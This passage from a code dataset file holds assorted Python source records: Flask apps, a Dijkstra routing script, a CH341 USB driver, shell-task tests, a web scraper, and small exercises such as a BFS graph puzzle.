pd.DataFrame(1/forecasted_values)\n            result.rename(columns={0:self.data_name}, inplace=True)\n            result.index = date_index[-h:]\n\n            return result","sub_path":"pyflux/gas/gasexponential.py","file_name":"gasexponential.py","file_ext":"py","file_size_in_byte":9390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"328668938","text":"import numpy as np\nimport pickle\n\nfrom qanta.features.abstract import AbstractFeatureExtractor\nfrom qanta.util.constants import SENTENCE_STATS\nfrom qanta.util.environment import QB_QUESTION_DB\nfrom qanta.util.io import safe_open\nfrom qanta.datasets.quiz_bowl import QuizBowlDataset, QuestionDatabase\nimport warnings\n\n\nwarnings.warn('old features extractors are deprecated and need to be rewritten', DeprecationWarning)\n\n\nclass StatsExtractor(AbstractFeatureExtractor):\n    def __init__(self):\n        super(StatsExtractor, self).__init__()\n        with open(SENTENCE_STATS, 'rb') as f:\n            self.word_count_mean, self.word_count_std = pickle.load(f)\n\n        self.guess_frequencies = {}\n        question_db = QuestionDatabase(QB_QUESTION_DB)\n        all_questions = question_db.questions_with_pages()\n        for page in all_questions:\n            self.guess_frequencies[page] = sum(1 for x in all_questions[page] if x.fold == \"train\")\n\n        self.frequency_mean = np.mean(list(self.guess_frequencies.values()))\n        self.frequency_std = np.std(list(self.guess_frequencies.values()))\n        for page in all_questions:\n            normalized_frequency = normalize(\n                self.guess_frequencies[page],\n                self.frequency_mean,\n                self.frequency_std\n            )\n            self.guess_frequencies[page] = normalized_frequency\n        self.normed_missing_guess = normalize(0, self.frequency_mean, self.frequency_std)\n\n    @property\n    def name(self):\n        return 'stats'\n\n    def score_guesses(self, guesses, text):\n        n_words = len(text.split())\n        normalized_word_count = normalize(n_words, self.word_count_mean, self.word_count_std)\n        for guess in guesses:\n            formatted_guess = guess.replace(':', '').replace('|', '')\n            normalized_guess_frequency = self.guess_frequencies.get(\n                formatted_guess, self.normed_missing_guess)\n            feature = '|stats guess_frequency:{} words_seen:{} norm_words_seen:{}'.format(\n                normalized_guess_frequency, n_words, normalized_word_count)\n            yield feature\n\n\ndef normalize(value, mean, var):\n    return (value - mean) / var\n\n\ndef compute_question_stats(question_db_path: str):\n    dataset = QuizBowlDataset(5, qb_question_db=question_db_path)\n    train_dev_questions = dataset.questions_in_folds(('train', 'dev'))\n    question_lengths = [len(q.flatten_text().split())\n                        for q in train_dev_questions]\n\n    mean = np.mean(question_lengths)\n    std = np.std(question_lengths)\n\n    stats = (mean, std)\n\n    with safe_open(SENTENCE_STATS, 'wb') as f:\n        pickle.dump(stats, f)\n","sub_path":"qanta/features/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":2659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"511184000","text":"import elasticsearch\nimport flask_restful\nfrom flask import request, g\n\nfrom app import elastic_index, RestException\nfrom app.model.resource import ThrivResource\nfrom app.model.search import Facet, FacetCount, Filter\nfrom app.resources.schema import SearchSchema, ThrivResourceSchema\nfrom app.resources.Auth import login_optional\n\n\nclass SearchEndpoint(flask_restful.Resource):\n\n    @login_optional\n    def post(self):\n        request_data = request.get_json()\n        search, errors = SearchSchema().load(request_data)\n\n        if errors: raise RestException(RestException.INVALID_OBJECT, details=errors)\n        try:\n            if 'user' not in g or not g.user or g.user.role != \"Admin\":\n                search.filters.append(Filter(field=\"Approved\", value=\"Approved\"))\n                results = elastic_index.search_resources(search)\n                search.filters = search.filters[:-1]\n            else:\n                results = elastic_index.search_resources(search)\n        except elasticsearch.ElasticsearchException as e:\n            raise RestException(RestException.ELASTIC_ERROR)\n\n        search.total = results.hits.total\n\n        search.facets = []\n        for facet_name in results.facets:\n            if facet_name == \"Approved\":\n                if 'user' in g and g.user and g.user.role == \"Admin\":\n                    facet = Facet(facet_name)\n                    facet.facetCounts = []\n                    for category, hit_count, is_selected in results.facets[facet_name]:\n                        facet.facetCounts.append(FacetCount(category, hit_count, is_selected))\n                    search.facets.append(facet)\n            else:\n                facet = Facet(facet_name)\n                facet.facetCounts = []\n                for category, hit_count, is_selected in results.facets[facet_name]:\n                    facet.facetCounts.append(FacetCount(category, hit_count, is_selected))\n                search.facets.append(facet)\n\n        resources = []\n        for hit in results:\n            resource = ThrivResource.query.filter_by(id=hit.id).first()\n            if resource is not None:\n                resources.append(resource)\n        search.resources = ThrivResourceSchema().dump(resources, many=True).data\n        return SearchSchema().jsonify(search)\n","sub_path":"backend/app/resources/SearchEndpoint.py","file_name":"SearchEndpoint.py","file_ext":"py","file_size_in_byte":2286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"129611403","text":"import time\n\ndef clean(text):\n    '''处理文本以便于比较'''\n\n    # 去掉题号\n    text = text.split('.')[1]\n    # 去掉答案\n    text = text.split('@')[0]\n    # 去掉中文括号\n    text = text.split('(')[0]\n    # 去掉所有空格\n    text = text.replace(' ', '')\n    # 去掉所有逗号\n    text = text.replace(',', '')\n    # 去掉所有句号\n    text = text.replace('。', '')\n    # 英文转换为小写\n    text = text.lower()\n\n    return text\n\n\nt = time.time()\nwith open('a1_db.txt', 'r', encoding='UTF-8') as f_liuke, \\\n    open('a1去重后.txt', 'w', encoding='UTF-8') as f2:\n\n    # 分行提取六联题目,储存为列表lines_liuke\n    lines_liuke = f_liuke.readlines()\n\n    count = 0\n    for num_1st, line_1st in enumerate(lines_liuke):\n        for num_2nd, line_2nd in enumerate(lines_liuke):\n            if clean(line_1st) == clean(line_2nd) and num_1st < num_2nd:\n                count += 1\n                output = '第' + str(num_1st + 1) + '行与第' + str(num_2nd + 1) + '行重复'\n                print(output)\n                break\n        else:\n            f2.write(line_1st)\n\n\n\nprint('\\n共计耗时' + str(time.time()-t) + '秒,有' + str(count) + '道重复。')\n","sub_path":"其他/病理学/自身查重.py","file_name":"自身查重.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"547414309","text":"\"\"\"\nTests for shell task.\n\"\"\"\nfrom tests.fixtures import ProjectDirectory, project_directory\n\nimport pytest\n\n\ndef test_shell_task(project_directory: ProjectDirectory) -> None:\n    \"\"\"\n    Tests that a simple shell task (command, no argument) gets executed properly.\n    \"\"\"\n    pytest.skip(\"BROKEN\")\n    project_directory.set_config({\"LISTALL\": {\"type\": \"shell\", \"configuration\": {\"command\": \"ls\"}}})\n    output = project_directory.run_task(\"LISTALL\")\n    assert len(output) != 0\n\n\ndef test_shell_task_with_environment_variables(project_directory: ProjectDirectory) -> None:\n    \"\"\"\n    Tests a shell command w/ env. var.\n    \"\"\"\n    pytest.skip(\"BROKEN\")\n    project_directory.set_config(\n        {\"ECHO_W_ENV\": {\"type\": \"shell\", \"configuration\": {\"command\": \"env\", \"environment\": {\"TASK_OK\": \"BADABING\"}}}}\n    )\n    output = project_directory.run_task(\"ECHO_W_ENV\")\n    print(output)\n    assert \"TASK_OK=BADABING\" in output\n\n\ndef test_shell_task_with_arguments(project_directory: ProjectDirectory) -> None:\n    \"\"\"\n    Tests a shell command with arguments.\n    \"\"\"\n    pytest.skip(\"BROKEN\")\n    project_directory.set_config(\n        {\"ECHO_W_ARGS\": {\"type\": \"shell\", \"configuration\": {\"command\": \"echo\", \"arguments\": [\"Oof\", \"Ouch\"]}}}\n    )\n\n    assert \"Oof Ouch\" in project_directory.run_task(\"ECHO_W_ARGS\")\n","sub_path":"tests/tasks/test_shell.py","file_name":"test_shell.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"576861903","text":"import random\nimport numpy as np\nfrom numpy.random import *\nfrom scipy.integrate import odeint\n\n\ndef PendulumFn(x1range, x2range, numICs, tSpan, seed,\n               max_potential):  # function X = PendulumFn(x1range, x2range, numICs, tSpan, seed, max_potential)\n    # try some initial conditions for x1, x2\n    np.random.seed(seed=seed)\n\n    def dynsys(x, t):\n        dydt = np.zeros_like(x)\n        dydt[0] = x[1]  # x[1, :]\n        dydt[1] = -np.sin(x[0])  # x[0, :]\n        # print(dydt)\n        return dydt\n\n    def dynsys2(t, x):\n        return [x[0, :], -np.sin(x[0, :])]  # [x[1,:]; -np.sin(x[1,:])]\n\n    lenT = len(tSpan)\n\n    X = np.zeros((numICs * lenT, 2))\n\n    def potential(x, y):\n        return (1 / 2) * y ** 2 - np.cos(x)\n\n    # t = dynsys(2, [[2, 5], [4, 9]])\n\n    count = 1\n    for j in range(100 * numICs):  # j = 1:100*numICs\n        # randomly start from x1range(1) to x1range(2)\n        x1 = (x1range[1] - x1range[0]) * rand() + x1range[0]\n\n        # randomly start from x2range(1) to x2range(2)\n        x2 = (x2range[1] - x2range[0]) * rand() + x2range[0]\n\n        if potential(x1, x2) <= max_potential:\n            ic = [x1, x2]\n            temp = odeint(dynsys, ic, tSpan)\n            # [T, temp] = odeint(dynsys, ic, tSpan)\n\n            X[(count - 1) * lenT: lenT + (count - 1) * lenT, :] = temp\n            if count == numICs:\n                break\n            count = count + 1\n\n    if count < numICs:\n        print('oops, potential energy too small for IC box')\n\n    return X\n","sub_path":"data/PendulumFn.py","file_name":"PendulumFn.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"50106107","text":"# No. 2606\n# 바이러스\n# https://www.acmicpc.net/problem/2606\n\n# -문제\n# 7대의 컴퓨터가 <그림 1>과 같이 네트워크 상에서 연결되어 있다고 하자.\n# 1번 컴퓨터가 웜 바이러스에 걸리면 웜 바이러스는 2번과 5번 컴퓨터를 거쳐 3번과 6번 컴퓨터까지 전파되어\n# 2, 3, 5, 6 네 대의 컴퓨터는 웜 바이러스에 걸리게 된다.\n# 하지만 4번과 7번 컴퓨터는 1번 컴퓨터와 네트워크상에서 연결되어 있지 않기 때문에 영향을 받지 않는다.\n#\n#       1 ㅡㅡ 2 ㅡㅡ 3    4\n#        \\   /          /\n#          5 ㅡㅡ 6    7\n#             <그림 1>\n#\n# 어느 날 1번 컴퓨터가 웜 바이러스에 걸렸다.\n# 컴퓨터의 수와 네트워크 상에서 서로 연결되어 있는 정보가 주어질 때,\n# 1번 컴퓨터를 통해 웜 바이러스에 걸리게 되는 컴퓨터의 수를 출력하는 프로그램을 작성하시오.\n\n# -입력\n# 첫째 줄에는 컴퓨터의 수가 주어진다. 컴퓨터의 수는 100 이하이고 각 컴퓨터에는 1번 부터 차례대로 번호가 매겨진다.\n# 둘째 줄에는 네트워크 상에서 직접 연결되어 있는 컴퓨터 쌍의 수가 주어진다.\n# 이어서 그 수만큼 한 줄에 한 쌍씩 네트워크 상에서 직접 연결되어 있는 컴퓨터의 번호 쌍이 주어진다.\n\n# -출력\n# 1번 컴퓨터가 웜 바이러스에 걸렸을 때, 1번 컴퓨터를 통해 웜 바이러스에 걸리게 되는 컴퓨터의 수를 첫째 줄에 출력한다.\n\n# example input\n#\n# 7\n# 6\n# 1 2\n# 2 3\n# 1 5\n# 5 2\n# 5 6\n# 4 7\n\nfrom collections import deque\n\n\ndef bfs(v):\n    queue = deque()\n    queue.append(v)\n\n    # 큐가 있는동안 반복\n    while queue:\n        v = queue.popleft()\n        if v not in ans:\n            ans.append(v)\n            for i in data:\n                a = i[0]\n                b = i[1]\n                if a == v:\n                    queue.append(b)\n                elif b == v:\n                    queue.append(a)\n\n    return len(ans) - 1\n\n\nn = int(input())\nm = int(input())\n\ndata = []\nfor _ in range(m):\n    data.append(list(map(int, input().split())))\n\n# 양방향 간선이기에 노드가 작은 값을 앞으로 정렬\nfor i in data:\n    if i[0] > i[1]:\n        i.reverse()\ndata.sort()\n\nans = []\n\nprint(bfs(1))\n","sub_path":"BFS/#2606.py","file_name":"#2606.py","file_ext":"py","file_size_in_byte":2318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"40120246","text":"\"\"\"\nThe Sims 4 Community Library is licensed under the Creative Commons Attribution 4.0 International public license (CC BY 4.0).\nhttps://creativecommons.org/licenses/by/4.0/\nhttps://creativecommons.org/licenses/by/4.0/legalcode\n\nCopyright (c) COLONOLNUTTY\n\"\"\"\nfrom typing import Any, Callable\n\nfrom sims4communitylib.utils.common_function_utils import CommonFunctionUtils\nfrom sims4communitylib.dialogs.option_dialogs.options.common_dialog_option_context import CommonDialogOptionContext\nfrom sims4communitylib.dialogs.option_dialogs.options.objects.common_dialog_select_option import CommonDialogSelectOption\n\n\nclass CommonDialogActionOption(CommonDialogSelectOption):\n    \"\"\"CommonDialogActionOption(context, on_chosen=CommonFunctionUtils.noop)\n\n    An option that invokes a callback upon being chosen.\n\n    :param context: A context to customize the dialog option.\n    :type context: CommonDialogOptionContext\n    :param on_chosen: A callback invoked when the dialog option is chosen.\n    :type on_chosen: Callable[..., Any], optional\n    \"\"\"\n    def __init__(\n        self,\n        context: CommonDialogOptionContext,\n        on_chosen: Callable[..., Any]=CommonFunctionUtils.noop,\n    ):\n        def _on_chosen(_, __):\n            on_chosen()\n\n        super().__init__(\n            'Dialog Action',\n            None,\n            context,\n            on_chosen=_on_chosen\n        )\n","sub_path":"Scripts/sims4communitylib/dialogs/option_dialogs/options/objects/common_dialog_action_option.py","file_name":"common_dialog_action_option.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"392934745","text":"from requests import get\nfrom requests.exceptions import RequestException\nfrom contextlib import closing\nfrom bs4 import BeautifulSoup\nimport re\nimport time\n\ndef get_html(url):\n    try:\n        with closing(get(url, stream=True)) as resp:\n            ctype = resp.headers['Content-Type'].lower()\n\n            if resp.status_code == 200 and ctype is not None and ctype.find('html') > -1:\n                return resp.content\n            else:\n                return None\n\n    except RequestException as e:\n        return None\n\ndef get_links(raw_html):\n    root = BeautifulSoup(raw_html, 'html.parser')\n    mainsite = root.findAll('div', {'class': 'site-main'})[0]\n    return [article.find('a')['href'] for article in mainsite.findAll('article')]\n\ndef get_article_text(raw_html):\n    root = BeautifulSoup(raw_html, 'html.parser')\n    article = root.find('article').find('div', {'class': 'entry-content'})\n    texts = article.findAll('p', {'style': 'text-align: justify;'})\n    parsed = []\n\n    for text in texts:\n        try:\n            no_escapes = re.sub(r\"([#\\\\?])(\\w+)\\b\", ' ', text.find(text=True))\n            parsed.append(' '.join(no_escapes.split()))\n        except:\n            pass\n\n    return parsed\n\n\nif __name__ == '__main__':\n    for page_num in range(21, 40):\n        texts = []\n        time.sleep(2)\n        print('index:', page_num)\n        \n        index_html = get_html('https://www.amodelrecommends.com/category/beauty/page/' + str(page_num) + '/')\n        links = get_links(index_html)\n\n        for link in links:\n            print(link)\n            time.sleep(3)\n            article_html = get_html(link)\n            texts = texts + get_article_text(article_html)\n            \n\n        with open('parsed_amodelrecommends' + str(page_num) + '.txt', 'w') as outfile:\n            for text in texts:\n                outfile.write(text)\n                outfile.write('\\n')\n","sub_path":"Teams/semeai tech/util/parser/amrparser.py","file_name":"amrparser.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"610879810","text":"## CTI-110 \r\n## P4T2: Bug Collector\r\n## Dominique Perteet\r\n## 6/28/2018\r\n\r\n\r\n# Initialize the accumlator.\r\ntotal = 0\r\n\r\n# Get the bugs collected for each day.\r\nfor day in range(1, 8):\r\n    # Prompt the user.\r\n    print('Enter the bus collected on day', day)\r\n\r\n    # Input the number of bugs.\r\n    bugs = int(input())\r\n\r\n    # Add bugs to total.\r\n    total += bugs\r\n\r\n# Display the total bugs.\r\nprint('Collected a total of', total, 'bugs')\r\n","sub_path":"P4T2Bug CollectorPerteetDominique.py","file_name":"P4T2Bug CollectorPerteetDominique.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"298492563","text":"\n\nfrom xai.brain.wordbase.nouns._semaphore import _SEMAPHORE\n\n#calss header\nclass _SEMAPHORING(_SEMAPHORE, ):\n\tdef __init__(self,): \n\t\t_SEMAPHORE.__init__(self)\n\t\tself.name = \"SEMAPHORING\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"semaphore\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_semaphoring.py","file_name":"_semaphoring.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"307083679","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[32]:\n\n\nimport sys\nimport copy\ndef GetAdjlist(filename):\n    with open(filename,'r') as casefile:\n        case = casefile.read()\n        graphrows = case.split('\\n')\n        Adjlist=[]\n        for i in range(len(graphrows)):\n            a=graphrows[i].split(' ')\n            for j in range(len(a)):\n                a[j]=int(a[j])\n            Adjlist.append(a)\n        return Adjlist\n    \n\n\n\ndef findnextnode(dis,inf_dis):\n    nextnode={}\n    if inf_dis==True:\n        for i in range(len(dis)):  #i從0到n-1,node=i+1\n            if dis[i]!=0:\n                nextnode[i+1]=dis[i]\n                \n    if inf_dis==False:\n        for i in range(len(dis)):  #i從0到n-1,node=i+1\n            if dis[i]!=0 and dis[i]!=-1:\n                nextnode[i+1]=dis[i]\n    return nextnode\n\n\n\n\ndef Dijkstra_algorithm(Adjlist):\n    Adjlist=copy.deepcopy(Adjlist)\n    Graphsize = Adjlist[0][0]\n    Q=set(i for i in range(1,Graphsize+1))\n    nextrouter=[[None]]+[[i for i in range(1,Graphsize+1)] for j in range(Graphsize)]\n    \n    while Q:\n        nownode = Q.pop()\n        dis=Adjlist[nownode]\n        c=findnextnode(dis,False)\n        \n        while c.keys():\n            closestnode = min(c, key=c.get)\n            closestnodepath = findnextnode(Adjlist[closestnode],False)\n            \n            for i in closestnodepath.keys():\n                \n                if closestnodepath[i]+c[closestnode]remove router=-1 \n        Adjlist[i][router-1]=-1\n    for j in range(len(Adjlist[router])):  #The distance remove router->other router=-1 \n        Adjlist[router][j]=-1\n    Adjlist[router][router-1]=0  #remove router->remove router=0\n    return Adjlist\n\n\n# In[31]:\n\n\ndef main():    \n    if sys.argv[1]=='lf':\n        load = GetAdjlist(sys.argv[2])\n\n        with open ('log.txt','w') as logf:\n            logf.write(str(load)) #write adjlist into log.txt\n        with open ('file_name.txt','w') as fname:\n            fname.write(sys.argv[2][:-4])\n        with open ('router_rec.txt','w') as f:\n            f.write('[]')\n\n\n    if sys.argv[1]=='rm':\n        with open ('log.txt','r') as logf:\n            OpAdjlist=eval(logf.read())\n\n\n        rm = removerouter(OpAdjlist,int(sys.argv[2][1:]))\n        with open ('log.txt','w') as logf:\n            logf.write(str(rm)) #write adjlist into log.txt\n        with open ('router_rec.txt','r') as f:\n            a=eval(f.read())\n            a.append(int(sys.argv[2][1:]))\n        with open ('router_rec.txt','w') as f:\n            f.write(str(a))\n\n\n    if sys.argv[1]=='of':\n        with open ('log.txt','r') as logf:\n            OpAdjlist=eval(logf.read())\n        with open ('router_rec.txt','r') as f:\n            rmrouter = eval(f.read())\n\n        with open ('file_name.txt','r') as fname:\n            Opfilename = fname.read()+'_out2.txt'\n\n        Writetxt(OpAdjlist,Opfilename,rmrouter)\n\n        \nmain()\n\n\n# In[30]:\n\n\n\n\n\n# In[28]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"B08901067_hw3/src_2/Dijkstra2.py","file_name":"Dijkstra2.py","file_ext":"py","file_size_in_byte":4146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"582628861","text":"from ctypes import *\r\n\r\nfrom CH341DriverBase import *\r\n\r\n\r\n# MIT License.\r\n\r\n\r\nclass CH341Driver:\r\n    \"\"\"\r\n    This is basic interface code for a CH341 to be run in EPP 1.9 mode.\r\n    \"\"\"\r\n\r\n    def __init__(self, index=-1, bus=-1, address=-1, serial=-1, chipv=-1, state_listener=None):\r\n        if state_listener is None:\r\n            self.state_listener = lambda code: None\r\n        else:\r\n            self.state_listener = state_listener\r\n        try:\r\n            self.driver = windll.LoadLibrary(\"CH341DLL.dll\")\r\n        except (NameError, OSError):\r\n            raise ConnectionRefusedError\r\n        self.driver_index = 0\r\n        self.index = index\r\n        self.bus = bus\r\n        self.address = address\r\n        self.serial = serial\r\n        self.chipv = chipv\r\n        self.driver_value = None\r\n        self.state = None\r\n\r\n    def set_status(self, code):\r\n        self.state_listener(code)\r\n        self.state = code\r\n\r\n    def try_open(self, i):\r\n        \"\"\"Tries to open device at index, with given criteria\"\"\"\r\n        self.driver_index = i\r\n        val = self.driver.CH341OpenDevice(self.driver_index)\r\n        self.driver_value = val\r\n        if val == -1:\r\n            self.driver_value = None\r\n            self.set_status(STATE_CONNECTION_FAILED)\r\n            raise ConnectionRefusedError  # No more devices.\r\n        # There is a device.\r\n        if self.chipv != -1:\r\n            chipv = self.get_chip_version()\r\n            if self.chipv != chipv:\r\n                # Rejected.\r\n                self.set_status(STATE_DEVICE_REJECTED)\r\n                self.driver.CH341CloseDevice(self.driver_index)\r\n                return -1\r\n        if self.bus != -1:\r\n            pass  # Windows driver no bus check.\r\n        if self.address != -1:\r\n            pass  # Windows driver no address check.\r\n        if self.serial != -1:\r\n            pass  # No driver has a serial number.\r\n        # The device passes our tests.\r\n        return 0\r\n\r\n    def open(self):\r\n        \"\"\"\r\n        Opens the driver for unknown criteria.\r\n        \"\"\"\r\n        if self.driver_value is None:\r\n            self.set_status(STATE_DRIVER_CH341)\r\n            self.set_status(STATE_CONNECTING)\r\n            if self.index == -1:\r\n                for i in range(0, 16):\r\n                    if self.try_open(i) == 0:\r\n                        break  # We have our driver.\r\n            else:\r\n                self.try_open(self.index)\r\n            self.set_status(STATE_USB_CONNECTED)\r\n            self.set_status(STATE_CH341_PARAMODE)\r\n            try:\r\n                self.driver.CH341InitParallel(self.driver_index, 1)  # 0x40, 177, 0x8800, 0, 0\r\n                self.set_status(STATE_CH341_PARAMODE_SUCCESS)\r\n            except ConnectionError:\r\n                self.set_status(STATE_CH341_PARAMODE_FAIL)\r\n                self.driver.CH341CloseDevice(self.driver_index)\r\n            # self.driver.CH341SetExclusive(self.driver_index, 1)\r\n            self.set_status(STATE_CONNECTED)\r\n\r\n    def close(self):\r\n        \"\"\"\r\n        Closes the driver for the stated device index.\r\n        \"\"\"\r\n        self.driver_value = None\r\n        self.set_status(STATE_USB_SET_DISCONNECTING)\r\n        if self.driver_value == -1:\r\n            self.set_status(STATE_USB_RESET_FAIL)\r\n            raise ConnectionError\r\n        self.driver.CH341CloseDevice(self.driver_index)\r\n        self.set_status(STATE_USB_DISCONNECTED)\r\n\r\n    def write(self, packet):\r\n        \"\"\"\r\n        Writes a 32 byte packet to the device. This is typically \\x00 + 30 bytes + CRC\r\n        The driver will packetize the \\0xA6 writes.\r\n\r\n        :param packet: 32 bytes of data to be written to the CH341.\r\n        :return:\r\n        \"\"\"\r\n        if self.driver_value == -1:\r\n            raise ConnectionError\r\n        length = len(packet)\r\n        obuf = (c_byte * length)()\r\n        for i in range(length):\r\n            obuf[i] = packet[i]\r\n        length = (c_byte * 1)()\r\n        length[0] = 32\r\n        self.driver.CH341EppWriteData(self.driver_index, obuf, length)\r\n\r\n    def get_status(self):\r\n        \"\"\"\r\n        Gets the status bytes from the CH341. This is usually 255 for the D0-D7 values\r\n        And the state flags for the chip signals. Importantly are WAIT which means do not\r\n        send data, and ERR which means the data sent was faulty. And PEMP which means the\r\n        buffer is empty.\r\n\r\n        StateBitERR\t\t0x00000100\r\n        StateBitPEMP\t0x00000200\r\n        StateBitINT\t\t0x00000400\r\n        StateBitSLCT\t0x00000800\r\n        StateBitWAIT\t0x00002000\r\n        StateBitDATAS\t0x00004000\r\n        StateBitADDRS\t0x00008000\r\n        StateBitRESET\t0x00010000\r\n        StateBitWRITE\t0x00020000\r\n        StateBitSCL\t    0x00400000\r\n        StateBitSDA\t\t0x00800000\r\n        :return:\r\n        \"\"\"\r\n        if self.driver_value == -1:\r\n            raise ConnectionRefusedError\r\n        obuf = (c_byte * 6)()\r\n        self.driver.CH341GetStatus(self.driver_index, obuf)\r\n        return [int(q & 0xff) for q in obuf]\r\n\r\n    def get_chip_version(self):\r\n        \"\"\"\r\n        Gets the version of the CH341 chip being used.\r\n        :return: version. Eg. 48.\r\n        \"\"\"\r\n        if self.driver_value == -1:\r\n            raise ConnectionRefusedError\r\n        return self.driver.CH341GetVerIC(self.driver_index)\r\n","sub_path":"CH341WindllDriver.py","file_name":"CH341WindllDriver.py","file_ext":"py","file_size_in_byte":5269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"127300254","text":"settings = {\n    \"template_dir\": \"gunicorn\", # Type of template to match\n    \"site_name\": \"edgemon\", \n    \"site_url\": \"edgemon.org\", # url, e.g. mysite.com\n    \"proxy_port\": 29002, # proxy for gunicorn\n    \"top_level\": True, # App is at the top level of a url.\n    'subdomains' : [ # Additional nginx servers\n        { \n            \"prefix\": \"guessthatnumber\" ,\n            # WTF mustache? You lose access to other variables inside a loop?\n            \"site_name\": \"edgemon\", \n            \"site_url\": \"edgemon.org\", # url, e.g. mysite.com\n            \"root\": \"/home/chris/www/guessthatnumber/\",\n          },\n        {\n            \"prefix\": \"opentable\",\n            \"site_url\": \"edgemon.org\",\n            \"rewrite\": \"http://restaurant-pockets.heroku.com\",\n            }\n        ]\n    }\n","sub_path":"mustache_settings/edgemon.py","file_name":"edgemon.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"77034975","text":"# import necessary libraries\nimport os\nimport pandas as pd\nfrom flask import (\n    Flask,\n    render_template,\n    jsonify,\n    request,\n    redirect)\n# from flask_sqlalchemy import SQLAlchemy\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\n\nfrom datetime import datetime\n\nfrom config import dbuser, dbpassword, dbhost, dbport, dbname\n\n#################################################\n# Flask Setup\n#################################################\napp = Flask(__name__)\n\n#################################################\n# Database Setup\n#################################################\n\n# try:\n#     db_uri = os.environ['DATABASE_URL']\n# except KeyError:\n#     db_uri = \"Insert Local Database\"\n\n# print(db_uri)\n# app.config['SQLALCHEMY_DATABASE_URI'] = db_uri\n\n# db = SQLAlchemy(app)\n\n# Connect session or connection to db\n# session = Session(engine)\n# connection = engine.connect()\n\n# Connect to Database - Alternative\nengine = create_engine(\n    f\"postgres://{dbuser}:{dbpassword}@{dbhost}:{dbport}/{dbname}\")\n# f'postgresql://{dbuser}:{dbpassword}@database-1.cvmfiiilpm7y.us-east-1.rds.amazonaws.com:{dbport}/{dbname}')\n\nsession = Session(engine)\nconnection = engine.connect()\n\nyoutubeVids = pd.read_sql(f\"SELECT * FROM youtube_table\", connection)\n\nconnection.close()\nsession.close()\n\n\n@app.route(\"/\")\ndef home():\n    return render_template(\"index.html\")\n\n\n@app.route(\"/data/\")\ndef data(country):\n    ##### Open a session/connection #####\n\n    singleCountry_youtubeVids = youtubeVids[youtubeVids[\"country\"] == country]\n\n    singleCountry_youtubeVids = singleCountry_youtubeVids.to_dict(\n        orient='records')\n    ##### Close the session/connection #####\n\n    ##### Return a json which could be parsed further using js #####\n    return jsonify(singleCountry_youtubeVids)\n\n\n@app.route(\"/bar//\")\ndef bar(country, metric):\n\n    barData = youtubeVids[youtubeVids[\"country\"] == country]\n\n    barData = barData.groupby('categoryId').sum()\n    barData = barData[metric]\n    barData = barData.to_dict()\n\n    return jsonify(barData)\n\n\n@app.route(\"/line//\")\ndef line(country, metric):\n    lineData = youtubeVids[youtubeVids[\"country\"] == country]\n    # add a timestamp column to dataframe\n    timestamps = []\n    for index, row in lineData.iterrows():\n        t = row[\"publishedAt\"]\n        td = datetime(t.year, t.month, t.day)\n        datetime.timestamp(td)\n        timestamps.append(datetime.timestamp(td))\n    lineData[\"timestamp\"] = timestamps\n    # get top three categories\n    topThree = list(lineData.groupby([\"categoryId\"]).sum()[\n                    \"likes\"].sort_values(ascending=False).index[0:3])\n    # Select one category and group by timeStamp\n    first = lineData[lineData[\"categoryId\"] == topThree[0]]\n    first = first.groupby(\"timestamp\").sum()\n    first = first[metric].to_dict()\n    return jsonify(first)\n\n\nif __name__ == \"__main__\":\n    app.run(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"213169807","text":"import itertools\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport scikit_posthocs as sp\nfrom scipy import stats\nfrom scipy.stats import ranksums\nfrom scipy.stats import ttest_ind\n\nfrom .losses import Losses\n\n\nclass AnalyseResults(object):\n    \"\"\"\n    Analyze results of machine learning experiments.\n\n    Parameters\n    ----------\n    result : sktime result object\n        class for storing the results\n    \"\"\"\n\n    def __init__(self,\n                 results):\n\n        self._results_list = results.load()\n\n    def prediction_errors(self, metric):\n        \"\"\"\n        Calculates the average prediction error per estimator as well as the prediction error achieved by each estimator on individual datasets.\n\n        Parameters\n        -----------\n        metric : `sktime.analyse_results.scores`\n            Error function \n        Returns\n        -------\n        pickle of pandas DataFrame\n            ``estimator_avg_error`` represents the average error and standard deviation achieved by each estimator. ``estimator_avg_error_per_dataset`` represents the average error and standard deviation achieved by each estimator on each dataset.\n        \"\"\"\n        # load all predictions\n        losses = 